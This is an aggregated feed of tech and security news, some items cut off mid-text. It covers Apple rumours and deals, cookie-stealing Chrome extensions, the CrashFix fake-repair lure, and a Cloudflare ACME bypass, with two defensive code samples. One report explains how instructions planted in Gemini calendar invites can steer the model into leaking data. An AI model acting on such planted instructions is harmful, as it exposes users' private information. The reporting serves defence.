According to IDC's Worldwide Quarterly Mobile Phone Tracker, global smartphone shipments reached 1.26 billion units in 2025, up 1.9% year over year. Globally, Apple remained the largest smartphone vendor in 2025, shipping 247.8 million iPhones for a 19.7% market share. Apple's shipments grew 6.3% year over year. Samsung ranked second with 241.2 million units shipped and a 19.1% share, while Xiaomi placed third with 165.3 million units and a 13.1% share, despite a year-over-year decline.
Tags: China, Counterpoint, IDC
This article, "Apple Regains Top Spot in China's Smartphone Market" first appeared on MacRumors.com


View the full article
Woot this week kicked off a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one-year Apple limited warranty, but there are other items that are refurbished.

Note: MacRumors is an affiliate partner with Woot. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter model, down from $1,599.00, and the sale also includes all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

UP TO $450 OFF: Apple Studio Display at Woot

Another notable discount in this sale is Apple's 1m Thunderbolt 4 (USB-C) Pro Cable for $35.99, down from $69.00. This accessory is also in new condition and it comes in bulk packaging. You'll find a few similar charging accessories on sale during this event, including Apple first-party USB-C and Lightning cables.

In addition to the base discounts, you can use the code APPLEFIVE at checkout to get an extra $5 off every item in this sale. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.







Related Roundup: Apple Deals
This article, "Woot's New Apple Sale Takes Up to $450 Off Studio Display and More" first appeared on MacRumors.com


View the full article
T. Schneider – shutterstock.com
Researchers at the security vendor Socket have discovered a coordinated campaign built on malicious Chrome add-ons. The attackers bypassed the Chrome Web Store's defences and promoted the extensions as productivity tools.
"The extensions work together to steal authentication tokens, block incident-response functions and enable complete account takeover through session hijacking," the security specialists explain in a blog post.
The people behind the campaign published five Chrome extensions that, despite professional branding and seemingly legitimate use cases, perform malicious actions deep inside enterprise workflows.
Install counts suggest that more than 2,300 users were tricked into installing these tools. The extensions target systems such as Workday, NetSuite and SuccessFactors, where a single hijacked session can expose employee data, financial data and internal workflows.
Disguised productivity tools with malicious code
The extensions posed as productivity boosters or security helpers for enterprise users. In their listings, the attackers showed professionally designed dashboards and promised simplified access to HR or ERP tools. The permissions requested were "standard" and covered seemingly harmless functions such as cookie access or modifying websites.
After installation, however, three of the extensions, among them DataByCloud Access, Data By Cloud 1 and a variant named Software Access, exfiltrated session cookies containing authentication tokens to attacker-controlled infrastructure. In many enterprise systems these tokens are sufficient to authenticate a user without a password. In some cases the cookies were extracted every 60 seconds to ensure the credentials were current.
Compromised sessions can function like stolen passwords: they have already passed the login pages and multi-factor checks, so they give direct access to an account without triggering the usual security warnings.
"All five extensions are still under investigation at the time of writing," the researchers say. "We have filed removal requests with Google's security team for the Chrome Web Store."
Blocked security measures and session hijacking
The campaign went beyond credential theft, however. Two of the extensions, Tool Access 11 and Data By Cloud 2, contained DOM-manipulation routines that actively blocked access to security and administration pages within the target platforms. As a result, enterprise admins could not change passwords, view login history or disable compromised accounts even when they noticed suspicious behaviour.
The most technically advanced of the five extensions, Software Access, offered, in addition to cookie theft, bidirectional cookie injection, in which stolen session tokens were placed into an attacker-controlled browser. Using APIs such as "chrome.cookies.set()", this function implants valid authentication cookies directly and grants the attackers an authenticated session without the unsuspecting users having to take any further action.
"While four extensions are published under databycloud1104 and the fifth under a different brand name, all five show identical infrastructure patterns, which points to a single coordinated operation," the researchers add.
Protection tips
Socket advises organisations to strictly vet and restrict browser extensions, to examine permission requests closely and to remove add-ons that unnecessarily access cookies or enterprise websites. The blog also recommends monitoring unusual session activity and using tools that can detect malicious extension behaviour before it reaches users. (jm)

 
View the full article
A set of three security vulnerabilities has been disclosed in mcp-server-git, the official Git Model Context Protocol (MCP) server maintained by Anthropic, that could be exploited to read or delete arbitrary files and execute code under certain conditions. "These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README,
View the full article
Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT). The activity delivers "weaponized files via Dynamic Link Library (DLL) sideloading, combined with a legitimate, open-source Python pen-testing script," ReliaQuest said in a report shared with
View the full article
Apple will launch a second-generation iPhone Air this year, despite reports that it has been delayed until 2027, according to the Weibo leaker known as Fixed Focus Digital.


Doubling down on a similar claim they made late last year, the leaker says feedback coming from the production line still suggests that the iPhone Air 2 will launch in the fall – presumably alongside the iPhone 18 Pro models and a rumored foldable iPhone.

The second-generation device will have "very minor changes," making it "basically a routine upgrade," the leaker said in comments machine-translated from Chinese.

The rumor comes in contrast to a November report from The Information that said Apple had decided to delay the launch of the next-generation ‌iPhone Air‌ until 2027 as a result of poor sales. A second report from the same outlet claimed Apple will use the delay to work on a redesign of the device that could include a second rear camera, as well as a lighter weight, vapor chamber cooling, and a larger battery capacity.

Notably, Bloomberg's Mark Gurman responded to these reports shortly after they were published, claiming his sources indicated that the iPhone Air 2 was not in fact delayed, because it had never been earmarked for 2026 in the first place. "The fact that Apple named the device the iPhone Air (rather than the iPhone 17 Air) signaled that it didn’t want to tie the product to an annual release schedule," said Gurman at the time.

Gurman believes a refreshed Air could potentially roll out in spring 2027 alongside the standard iPhone 18 and the iPhone 18e, as part of Apple's new split-launch strategy. In addition, Gurman's sources said the main focus of the second Air will be a move to a 2-nanometer chip that will improve the device's battery life, rather than introducing major structural changes.

It is still possible that a new ‌iPhone Air‌ could launch this coming fall, but the previous reports cast doubt on the Chinese leaker's claim. Fixed Focus Digital previously broke the news ahead of launch about the iPhone 16e name.
Related Roundup: iPhone Air
Tag: Fixed Focus Digital
Buyer's Guide: iPhone Air (Buy Now)
This article, "iPhone Air to Get Minor Refresh This Year, Claims Leaker" first appeared on MacRumors.com


View the full article
The following is the list of changes as part of the F5 Distributed Cloud Services documentation update:
Data Residency and Processing
Updated the Data Residency and Processing Reference document to add Google Cloud for NGINXaaS and remove Zapier, Inc. from sub-processors for F5 Distributed Cloud (DDoS Protection, CDN, WAAP, AI Assistant).
View the full article
The Problem: The Identities Left Behind
As organizations grow and evolve, employees, contractors, services, and systems come and go - but their accounts often remain. These abandoned or “orphan” accounts sit dormant across applications, platforms, assets, and cloud consoles. The reason they persist isn’t negligence - it’s fragmentation. Traditional IAM and IGA systems are designed
View the full article
Cybersecurity researchers have disclosed details of a malware campaign that's targeting software developers with a new information stealer called Evelyn Stealer by weaponizing the Microsoft Visual Studio Code (VS Code) extension ecosystem. "The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developer
View the full article
Security researchers have uncovered a malicious browser extension campaign, dubbed CrashFix, that deliberately crashes victims’ browsers and then uses the resulting confusion to trick users into running attacker-supplied commands.

The activity, attributed to a threat cluster Huntress calls KongTuke, involves a fake Chrome extension posing as an ad-blocking tool but ultimately delivering a novel malware payload.
The extension, which Huntress identified as NexShield-Advanced Web Protection, was distributed through look-alike branding and deceptive metadata designed to resemble the legitimate uBlock Origin Lite ad blocker. After installation, it remains inactive for a period of time, likely to evade immediate suspicion, before intentionally destabilizing the browser by exhausting system resources and triggering repeated crashes.
Once the browser becomes unusable, victims are presented with a fake “repair” prompt instructing them to paste and execute a command to resolve the issue.
From fake protection to forced failure
According to Huntress’ analysis, the malicious extension does not immediately perform malicious actions. Instead, it waits approximately an hour after installation before initiating the crash routine. The extension repeatedly opens connections and consumes memory until the browser becomes unresponsive, forcing users to restart or troubleshoot what appears to be a legitimate failure.
“The extension sets up to two timers: the first triggers once after a 60-minute delay, and the second fires every 10 minutes after the initial trigger,” Huntress researchers said in a blog post. “This timing strategy is in place so that when a user installs the extension, nothing malicious happens immediately. Sixty minutes later, the malicious payload activates, and every 10 minutes thereafter, the payload continues to execute.”
On relaunch, the victim receives an alert claiming the browser encountered a critical error and requires manual remediation. Victims are instructed to open the Windows Run dialog and paste a command already copied to the clipboard. This command launches the next stage of the attack.
Huntress emphasized that this technique mirrors a growing trend in “ClickFix”-style attacks, where users are socially engineered into executing malicious code themselves under the guise of system recovery or security remediation. ClickFix techniques have been observed across multiple DPRK-linked campaigns, including variants associated with the long-running Contagious Interview operation.
Payload delivery
When the user executes the supplied commands, a multistage infection process begins that ultimately deploys a previously undocumented Python-based remote access trojan, which the researchers dubbed ModelRAT. The malware establishes persistence and enables remote control of the infected system.
Huntress’ telemetry suggested differing behavior based on the environment. Systems joined to a domain were more likely to receive the full payload chain, while non-domain systems sometimes received lighter or incomplete stages.
The researchers also drew parallels between the CrashFix execution flow and SocGholish (FakeUpdates) campaigns, noting the shared reliance on user-driven execution rather than technical exploitation. As with SocGholish activity, the attacker’s success depends on convincing the victim to manually run a command under the guise of remediation or system recovery.
Recommendations included removing untrusted or look-alike browser extensions and reinforcing guidance against manually executing “fix” commands prompted by browser errors. The researchers also shared indicators of compromise (IOCs) tied to the malicious extension, command execution, and follow-on activity to aid detection and response.
Cloudflare has addressed a security vulnerability impacting its Automatic Certificate Management Environment (ACME) validation logic that made it possible to bypass security controls and access origin servers. "The vulnerability was rooted in how our edge network processed requests destined for the ACME HTTP-01 challenge path (/.well-known/acme-challenge/*)," the web infrastructure
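The defender's lesson in the excerpt above is that an exception carved out for the HTTP-01 challenge path must be exactly as wide as the challenge itself and no wider. The following is an added illustration of such a narrowly scoped handler on an origin server; it is not Cloudflare's code or fix, and the `pending` token store and the `came_via_edge` flag (whatever origin authentication you use, such as mTLS or an edge address allowlist) are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Path prefix defined for the ACME HTTP-01 challenge (RFC 8555, section 8.3).
ACME_PREFIX = "/.well-known/acme-challenge/"
# HTTP-01 tokens are base64url strings carrying at least 128 bits of entropy,
# i.e. 22 or more characters. Anything else is not a challenge request.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{22,}$")


def acme_token(raw_path: str):
    """Return the challenge token if raw_path is a well-formed HTTP-01 request,
    otherwise None. The path is decoded and normalised before matching so that
    '..' segments or percent-encoded dots cannot ride along on the ACME prefix."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    decoded = unquote(path)
    if "\x00" in decoded or "\\" in decoded:
        return None
    # normpath collapses ".", ".." and "//"; a traversal out of the prefix
    # therefore ends up as a path that no longer starts with the prefix.
    norm = posixpath.normpath(decoded)
    if not norm.startswith(ACME_PREFIX):
        return None
    token = norm[len(ACME_PREFIX):]
    if "/" in token or not TOKEN_RE.fullmatch(token):
        return None
    return token


def classify_request(raw_path: str) -> str:
    """'acme' only for a well-formed challenge request; everything else is 'protected'."""
    return "acme" if acme_token(raw_path) else "protected"


def handle_request(raw_path: str, pending: dict, came_via_edge: bool):
    """Minimal origin dispatcher (illustration only).

    pending maps tokens the ACME client is currently expecting to their key
    authorizations; came_via_edge is the result of the origin's own check that
    the request arrived through the protected edge. Returns (status, body)."""
    token = acme_token(raw_path)
    if token is not None:
        # The carve-out is exact: only a known pending token gets an answer,
        # and nothing else is served from this path.
        if token in pending:
            return 200, pending[token]
        return 404, ""
    # Everything outside the carve-out keeps the normal controls.
    if not came_via_edge:
        return 403, ""
    return 200, "application response"
```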
Leaked API keys are no longer unusual, nor are the breaches that follow. So why are sensitive tokens still being so easily exposed? To find out, Intruder’s research team looked at what traditional vulnerability scanners actually cover and built a new secrets detection method to address gaps in existing approaches. Applying this at scale by scanning 5 million applications revealed over
A newly disclosed weakness in Google’s Gemini shows how attackers could exploit routine calendar invitations to influence the model’s behavior, underscoring emerging security risks as enterprises embed generative AI into everyday productivity and decision-making workflows.
The vulnerability was identified by application security firm Miggo. In its report, Miggo’s head of research, Liad Eliyahu, said Gemini parses the full context of a user’s calendar events, including titles, times, attendees, and descriptions, allowing it to answer questions such as what a user’s schedule looks like for the day.
“The mechanism for this attack exploits that integration,” Eliyahu said. “Because Gemini automatically ingests and interprets event data to be helpful, an attacker who can influence event fields can plant natural language instructions that the model may later execute.” 
Miggo’s researchers said the finding highlights a broader security challenge facing LLM-based systems, where attacks focus on manipulating meaning and context rather than exploiting clearly identifiable malicious code.
“This Gemini vulnerability isn’t just an isolated edge case,” Eliyahu said. “Rather, it is a case study in how detection is struggling to keep up with AI-native threats. Traditional AppSec assumptions (including recognizable patterns and deterministic logic) do not map clearly to systems that reason in language and intent.”
Severity vs traditional attacks
The issue is significant not because it mirrors a conventional software flaw, but because it demonstrates how AI systems can be manipulated in ways similar to social engineering attacks.
“Traditionally, a calendar invite, email, or document is treated as data only,” said Sunil Varkey, a cybersecurity analyst. “The attacker must break code logic or memory safety to make the system ‘do something’, rather than rely on data alone.”
But in this case, the ‘bug’ is less about flawed code and more about how an LLM interprets language in context, combined with the permissions it has across connected applications, said Sakshi Grover, senior research manager for IDC Asia Pacific Cybersecurity Services.
“That combination turns a normal business object, a calendar invite, into an attack payload,” Grover said. “It reveals that LLM security at major vendors is still catching up to real-world enterprise threat models, especially around indirect prompt injection, tool use, and cross-app data handling.”
Keith Prabhu, founder and CEO of Confidis, said that while the execution of this attack occurs through Google Gemini, it more closely resembles a phishing-style technique.
“Once the malicious invite is accepted by the user, Gemini considers the accepted invite as trusted and executes the prompt,” Prabhu said. “While the rest of the computing world is moving towards Zero Trust, AI tools still trust desktop components implicitly. This can be a serious flaw since AI tools can be misused to act as a ‘concierge’ to do tasks that malware cannot directly do.”
Real enterprise exposure
Analysts point out that the risk is significant in enterprise environments as organizations rapidly deploy AI copilots connected to sensitive systems.
“As internal copilots ingest data from emails, calendars, documents, and collaboration tools, a single compromised account or phishing email can quietly embed malicious instructions,” said Chandrasekhar Bilugu, CTO of SureShield. “When employees run routine queries, the model may process this manipulated context and unintentionally disclose sensitive information.”
Grover said that threats of prompt injection have moved from theoretical to operational. “In IDC’s Asia/Pacific Study conducted in August 2025, enterprises in India cited ‘LLM prompt injection, model manipulation, or jailbreaking AI assistants’ as the second most concerning AI-driven threat, right after ‘model poisoning or adversarial inputs during AI training’,” she added.
Measures to prioritize
Prabhu said that security leaders need to include AI security awareness as a part of their annual information security training for all staff. The endpoints would also need to be hardened, keeping in mind threats due to this new attack vector.
Grover said organizations should assume prompt injection attacks will occur and focus on limiting the potential blast radius rather than trying to eliminate the risk altogether. She said this requires enforcing least privilege for AI systems, tightly scoping tool permissions, restricting default data access, and validating every AI-initiated action against business rules and sensitivity policies.
“The goal is not to make the model immune to language, because no model is, but to ensure that even if it is manipulated, it cannot quietly access more data than it should or exfiltrate information through secondary channels,” Grover added.
Varkey said security leaders should also rethink how they position AI copilots within their environments, warning against treating them like simple search tools. “Apply Zero Trust principles with strong guardrails: limit data access to least privilege, ensure untrusted content can’t become trusted instruction, and require approvals for high-risk actions such as sharing, sending, or writing back into business systems,” he added.
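One way to turn the controls the analysts describe (tool scoping, keeping untrusted content from becoming an instruction, sensitivity rules, approval for high-risk actions) into a policy gate that sits between an assistant and its tools. This is an added illustration, not Google's or any vendor's code; the tool names, the provenance tags carried in `sources` (assumed to be supplied by the orchestrator) and the `example.com` domain are assumptions.

```python
from dataclasses import dataclass, field

# Hypothetical tool inventory; the names are illustrative.
READ_ONLY_TOOLS = {"list_events", "read_document"}
HIGH_RISK_TOOLS = {"send_email", "share_document", "update_calendar"}
INTERNAL_DOMAIN = "example.com"  # constructed


@dataclass
class ToolCall:
    name: str
    args: dict
    # Provenance of the context the model used to form this call, as tagged by
    # the orchestrator (assumption): "user" for the user's own prompt,
    # "calendar:<id>", "email:<id>" and so on for ingested content.
    sources: frozenset = field(default_factory=frozenset)


def untrusted_sources(call: ToolCall) -> set:
    """Everything that did not come directly from the user is untrusted."""
    return {s for s in call.sources if s != "user"}


def decide(call: ToolCall, granted_tools: set, approved: set) -> tuple:
    """Return (verdict, reason); verdict is 'allow', 'hold' or 'deny'.

    granted_tools is the least-privilege tool set for this user, which is also
    where default data access is restricted. approved holds the names of
    high-risk tools a human has explicitly approved for this turn."""
    # 1. Least privilege: the assistant only gets the tools scoped to it.
    if call.name not in granted_tools:
        return "deny", f"tool {call.name} not granted"
    untrusted = untrusted_sources(call)
    # 2. Untrusted content never becomes an instruction for a side-effecting
    #    action. The user can restate the request directly if it was genuine.
    if call.name in HIGH_RISK_TOOLS and untrusted:
        return "deny", "high-risk action derived from untrusted content: " + ", ".join(sorted(untrusted))
    # 3. Sensitivity rule: labelled data may not leave the organisation.
    if call.name in {"send_email", "share_document"}:
        recipient = call.args.get("to", "")
        label = call.args.get("label", "public")
        if label != "public" and not recipient.endswith("@" + INTERNAL_DOMAIN):
            return "deny", f"{label} data to external recipient {recipient}"
    # 4. Approval gate for anything that sends, shares or writes back.
    if call.name in HIGH_RISK_TOOLS:
        if call.name not in approved:
            return "hold", "awaiting human approval"
        return "allow", "approved high-risk action"
    if call.name in READ_ONLY_TOOLS:
        return "allow", "read-only"
    return "deny", "unclassified tool"
```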
Over the last few months, rumors around the iPhone 18 Pro's front-panel design have been conflicted, with some supply-chain leaks pointing to under-display Face ID, reports suggesting a top-left hole-punch camera, and debate over whether the familiar Dynamic Island will shrink, shift, or disappear entirely.

Today, Weibo-based leaker Instant Digital shared new details and imagery that appear to clarify the situation.

The image shows what looks to be a leaked Face ID sensor assembly made up of three distinct modules mounted on a single flex cable: an infrared flood illuminator on the left, and a centered dot projector with an infrared camera to its right.

Crucially, this layout suggests that the flood illuminator – being relatively small and optically simple – is the only Face ID component likely to be placed under the display, in the top-left area of the screen. The dot projector and infrared camera, by contrast, would remain centered and housed within a reduced, pill-shaped Dynamic Island.

Last month, The Information reported that the front camera would be moved to the top-left corner of the display on iPhone 18 Pro models, explicitly claiming this change would eliminate the pill-shaped cutout. Instant Digital now appears to be pushing back on that interpretation.

According to the leaker, early reports from Chinese and Korean sources about the possible relocation of an infrared component were later mistranslated in some English-language coverage as a visible left-side hole-punch front camera. That leap conflated different Face ID elements and overlooked how Apple typically evolves its front sensor layout, allowing a minor internal change to be misread as a major external redesign.

In short, reports of a top-left hole-punch camera on the iPhone 18 Pro and iPhone 18 Pro Max now appear to be incorrect. The only visible change suggested by the leak is a smaller, centered Dynamic Island – as per some reports – enabled by relocating the IR flood illuminator outside of it and under the display.

Apple is likely to unveil the iPhone 18 Pro models in September. Barring any more conflicting rumors, we now have a clearer picture of what the front display will look like.
This article, "iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout" first appeared on MacRumors.com
For a long time, cybersecurity was pretty straightforward: Guard the edges, and everything inside should be fine. Firewalls, DMZs, VPNs — these were the go-to tools. Back then, it worked. Apps lived in data centers, and everyone showed up at the office. But that world disappeared before most companies even noticed.
Remote work, cloud adoption and distributed applications slowly dissolved the network edge. And attackers took advantage of that gap long before defenders adapted. Verizon’s annual Data Breach Investigations Report repeatedly shows that a large portion — often over 80% — of modern breaches involve compromised credentials, not network flaws.
That number says a lot. It tells us the perimeter didn’t just shift — it collapsed around identity.
The old perimeter: Strong walls, weak assumptions
Traditional security assumed one thing: “If someone is inside the network, they can be trusted.”
That assumption worked when offices were closed environments and systems lived behind a single controlled gateway. But as Microsoft highlights in its Digital Defense Report, attackers have moved almost entirely toward identity-based attacks because stealing credentials offers far more access than exploiting firewalls.
In other words, attackers stopped trying to break in. They simply started logging in.
Cloud + remote work = No perimeter
Now, with remote work and the cloud, there’s no real perimeter left. People connect from home Wi-Fi, personal laptops, airports, coffee shops — you name it. At the same time, company data and workloads are scattered across AWS, Azure, Google Cloud and various SaaS platforms. The old rules just don’t fit anymore.
There is no single “inside” anymore. There is only identity — the user behind the request.
This is why modern security frameworks, including NIST’s Zero Trust Architecture guidelines (SP 800-207), emphasise identity as the primary control point rather than the network.
Identity is now the primary attack surface
Identity brings convenience, but it also brings complexity — and complexity attracts attackers.
People reuse passwords. MFA fatigue attacks work far too often. Privileged accounts get over-granted. Contractors keep access long after their projects end. Service accounts multiply with no owner. Okta’s recent State of Identity Security report points out that identity misuse has become one of the fastest-growing attack vectors in enterprises.
Identity is no longer just a log-in step. It’s now the attacker’s first target.
Zero trust made identity the first door to lock
Zero trust isn’t about paranoia. It’s about verification. Never trust, always verify only works if identity sits at the center of every access decision.
That’s why CISA’s zero trust maturity model outlines identity as the foundation on which all other zero trust pillars rest — including network segmentation, data security, device posture and automation.
A strong identity-based perimeter includes:
- MFA everywhere
- SSO to reduce password fatigue
- Role-based access controls
- Privileged Access Management
- Device trust tied to user identity
- Continuous monitoring of user behaviour
- Adaptive, risk-based access policies
This isn’t the future — this is what’s expected today.
Identity done right requires real discipline
When identity becomes the perimeter, it can’t be an afterthought. It needs to be treated like core infrastructure. That means:
- Identity has to be engineered, not patched together.
- Lifecycle processes must be streamlined — joiners, movers and leavers must be tightly controlled.
- Privilege needs to be what people earn, not what they start with. Excess access is still one of the top contributors to breaches.
- Authentication methods need to evolve yearly. Static MFA policies won’t survive dynamic threats.
- Monitoring must follow behavior, not networks. Suspicious activity often hides in user patterns, not traffic flows.
- Identity ownership must be shared across security, IT and the business. Identity doesn’t succeed unless everyone is accountable.
Gartner has been emphasising this shift for years, calling identity “the new security perimeter” in multiple research publications aimed at CISOs and enterprise architects.
Where we’re heading next
Identity is already at the centre of modern cybersecurity, but its role is only going to grow stronger. Over the next few years:
- Passwords will fade out in favour of passkeys and biometrics.
- Machine identities will become as critical as human identities.
- Access decisions will adapt in real time based on behaviour.
- Identity platforms will become the central nervous system of enterprise security.
- Zero Trust will mature from architecture diagrams into everyday practice.
Organizations that invest in strong identity foundations won’t just improve security — they’ll improve operations, compliance, resilience and trust. Because when identity is solid, everything else becomes clearer: who can access what, who is responsible for what and where risk actually lives.
The companies that struggle will be the ones trying to secure a world that no longer exists — a perimeter that disappeared years ago.
Identity isn’t just the new perimeter.
It’s the new beginning.
Everything starts here now.
This article is published as part of the Foundry Expert Contributor Network.
Using a fake video of the well-known entrepreneur Reinhold Würth, fraudsters are currently trying to lure internet users into dubious financial investments. In the deceptively realistic clip, a version of the billionaire presumably generated with the help of artificial intelligence (AI) invites viewers to a supposedly exclusive investment. In the background is a shelf of the trading group's products. The promise: quick profits even with small stakes. The group confirmed that the video is a fake. Several media outlets had reported on it earlier.
Reinhold Würth has no connection whatsoever to offers of this kind, a press spokeswoman said on request. “Such deepfake manipulations constitute serious identity misuse and serve exclusively fraudulent purposes.” The company condemns the practice in the strongest terms and clearly distances itself from the content being circulated.
According to the statement, the Würth Group is already taking consistent action against the distribution of the material and is in contact with law enforcement authorities. The public has been warned about the fake video via official social media channels. The company advises those affected not to engage with the supposed financial offers. Anyone who has already invested money should inform their bank immediately and file a report with the police.
Würth, headquartered in Künzelsau (Baden-Württemberg), is regarded as the world market leader in fastening and assembly technology. Its range comprises more than a million products, including screws and wall plugs. Company patriarch Reinhold Würth is among the richest Germans. A little over a year ago, the 90-year-old largely withdrew from his life's work.
Offers are often hard to recognize as fraud
The police and the Federal Financial Supervisory Authority (Bafin) regularly warn about scams of this kind. Advertisements or emails are repeatedly circulated that use photos or videos of celebrities, without their knowledge, to promote supposedly safe investments with extraordinarily high returns. They often involve crypto assets or other financial products. The offers are frequently professionally designed and hard for laypeople to recognize as fraud.
Bafin warns against clicking links in such advertisements. They frequently lead to fraudulent online trading platforms. After registration, the perpetrators pose as experts and talk victims into small investments at first, then into ever larger ones. The profits displayed are merely faked. In reality, no investment usually takes place at all and the money paid in flows to the fraudsters. The police have compiled further tips on a website. (dpa/jm)
A free, publicly accessible database for IT security vulnerabilities, the db.gcve.eu, has been created by GCVE (Global Cybersecurity Vulnerability Enumeration). The aim is to end dependence on US databases and strengthen digital sovereignty in Europe.
The initiative came together after a brief scare in 2025 over the possible discontinuation of the Common Vulnerabilities and Exposures (CVE) program. The risk left many concerned and forced the cybersecurity industry to start thinking about alternatives.
GCVE database aims to facilitate vulnerability reporting
The platform brings together information from various public resources. These include the sources of the GCVE Numbering Authority (GNA) model, which replaces the traditional, centralized assignment of vulnerability identifiers (CVE IDs). Data from other recognized vulnerability directories is also used.
The decentralized approach makes it possible to assign and publish vulnerability identifiers autonomously without having to wait for central approval. A total of more than 25 different data sources are currently integrated. The vulnerability data collected is normalized, structured, and made searchable.
In addition, the open API offers seamless integration into existing compliance tools and risk management systems. This should enable security officers, scientists, computer security incident response teams, software providers, and open-source developers to track and evaluate security reports more efficiently across ecosystems.
A Telegram-based guarantee marketplace known for advertising a broad range of illicit services appears to be winding down its operations, according to new findings from Elliptic. The blockchain intelligence company said Tudou Guarantee has effectively ceased transactions through its public Telegram groups following a period of significant growth. The marketplace is estimated to have processed
Web browsers have long been the security sinkhole of enterprise infrastructure. While email is often cited as the most common entry point, malware often enters via the browser and is more difficult to prevent. Phishing, drive-by attacks, ransomware, SQL injections, man-in-the-middle (MitM), and other exploits all take advantage of the browser’s creaky user interface and huge attack surface, and the gullibility of most end users.
It is this last item — humans — that is the problem, and we need to be protected against ourselves. This is especially true as SaaS applications grow in usage, not to mention that every piece of hardware seems to come with a web server (and therefore a browser) to configure it. These use cases are aided and abetted by the increasing number of work-from-home staffers who depend on more browser-based apps.
This is why enterprise secure browsers have finally gotten their moment. The category, which has been mostly flying under the radar for the past six years, has seen a lot of changes. Google announced its own entry into the field in 2025. Appaegis, Talon and Perception Point were acquired by Mammoth Cyber, Palo Alto Networks and Fortinet respectively, showing how this technology has become part of a larger security context. To that end, other established security vendors have brought forth products in what Gartner is now calling the “remote browser isolation” market to complement their zero trust, secure services edge, or posture management security platforms.
Web browsers have security settings to protect your privacy and to enable you to browse sites more anonymously. This isn’t really a satisfactory solution because these settings will typically result in more user frustration. Turning up security settings will prevent your users from conducting business on many websites, either blocking pop-ups that are needed to navigate some business site, stopping forms from collecting important information, or making your browsing session miserable in some other fashion.
Brave, DuckDuckGo, RAV Online Security from ReasonLabs, Opera and others have more secure consumer-focused browsers, but these aren’t appropriate for enterprises. They are what I would call “safer” or “more private” browsers. Some vendors have taken the recommendations of the Global Privacy Control to heart and have developed their own browser extensions that help guard your individual privacy. All these browsers are better but still not good enough for business uses.
Instead, a different type of tool is needed to manage an entire browser collection. Gartner, in an April 2025 report, says, “Threat actors frequently target employees with phishing attacks to steal credentials and bypass endpoint detection and response controls, necessitating an additional layer of visibility and control within the web browser.” Gartner recommends that secure browsers complement “gaps in existing controls on managed devices rather than replace existing security controls, unless you are a cloud-only, remote-work-oriented company with few physical locations to secure.”
While some enterprise security products touch on browser security such as secure web gateways, running a browser in a virtual desktop or using a managed endpoint service, they don’t focus on the total browsing experience and can’t stop many of the potential threat vectors. This is why the secure browser has become more popular and is available in a variety of configurations that can help IT managers get a better handle on stopping attackers from getting a foothold inside your networks.
Tips to evaluate secure web browsers
Before you start an evaluation, you need to understand how these browsers work and how they will be managed. Browsers require a robust and granular collection of security controls to be able to work with the widest possible collection of websites and cloud services. This needs to happen from a central management platform that can apply a collection of firewall-like rules and policies across the entire user population. This includes several broad categories:
- Enable MFA at the beginning of any browser session by default.
- Handle isolation controls both with respect to the user’s session and to isolate any application from cross-infection. This means controlling the movement of data between the browser, your particular endpoint and the web application or applications involved.
- Control access to web destinations, either to allow or block this access.
- Detect malware to block phishing, man-in-the-browser and other attacks, such as those aimed at defeating browser extensions.
- Apply data loss prevention controls, which include browser settings such as ad blocking, URL and domain filtering, blocking printing, cut-and-paste operations, and screen sharing. These controls should also be able to manage your browser extensions in such a way that a user can’t override or circumvent them.
- Enable a variety of logging tools to aid in remediation or reconstruction in case of attacks or data destruction.
- Enable anonymous surfing for times when this is needed, such as protecting travellers when they are in more totalitarian locations.
- Enable a protected and secure file storage space that can be shared among a team of collaborators.
- Replace VPNs and virtual desktops as ways to deliver more secure remote and cloud services.
Any browser needs to integrate with existing security products such as identity management, cloud application security posture, single sign-on (SSO) and VPNs. That is a lot of software to work with, and some vendors have begun offering specialized browsers as part of their security platforms. For example, iBoss’ and Cloudflare’s Remote Browser Isolation tools are only available as an add-on option to their larger security platforms.
GigaOm’s rubric evaluates browsers against four different (and non-exclusive) operating modes, used in various combinations:
- A full desktop browser client, what we have called in the past a thick client, which replaces a consumer browser and typically connects to a secure remote session.
- A browser extension to existing consumer browsers, relevant to both the browser software and the underlying operating system.
- Agentless browser controls to enforce security policies.
- Cloud-based management and proxy, which is typically used with the above three modes or with a thin client that connects to the cloud service.
For example, Google’s Chrome Enterprise browser mostly relies on the fourth mode. Other products, such as Authentic8’s Silo, Palo Alto Networks’ Prisma and Island’s browsers, cover multiple modes. There is a fifth mode that Seraphic uses, building an agent that sits on top of the JavaScript engine and supplements existing browsers.
Why are these different deployment modes necessary? It is because the browser is so versatile and can operate in a variety of circumstances, ranging from controlling some SaaS-based application to viewing dynamic content from a database to managing a collection of remote servers. Having the different modes is a way to extend its utility and still provide a secure envelope in as many possible situations.
While all these products run specially crafted Chromium versions, they typically employ Linux virtual machines to provide remote isolation features. That could be an issue if you are trying to run web content that isn’t Linux friendly, such as some streaming services. The good news is that the secure browsers are close to parity with a standard desktop browser and running close to the most current Chrome versions.
The biggest issue to implement these browsers will be staffing and support. This starts with integration into your other security products and onboarding and training your users how to browse the web under the newer and hopefully more secure regime. This will be a significant load on your own internal support resources to handle the various helpline calls from confused or frustrated users when they encounter unexpected results from their browsing experience.
Finally, there is the price. For decades browsers have been free or bundled with the endpoint operating system. Secure browsers will cost something, and even a few dollars a month per user can add up over time and across an entire enterprise population. Gartner said in its report: “Free browsers are ubiquitous, to the point that organizations must have specific use cases to justify the purchase of a separate browser.” It remains to be seen if security is that compelling use case. Expect to pay somewhere around $10/month/user for subscription options, with quantity discounts available.
Secure web browsers compared
Authentic8 has been in the secure browser business for more than a decade and continues to enhance its product and widen its services offerings. Silo can provide two-way full isolation and integrate it into your existing workflows and provide a wide collection of security policies that offer fine-grained control over protecting your apps and your data. It has a main dashboard that looks a lot like an SSO tool to launch your protected web applications.
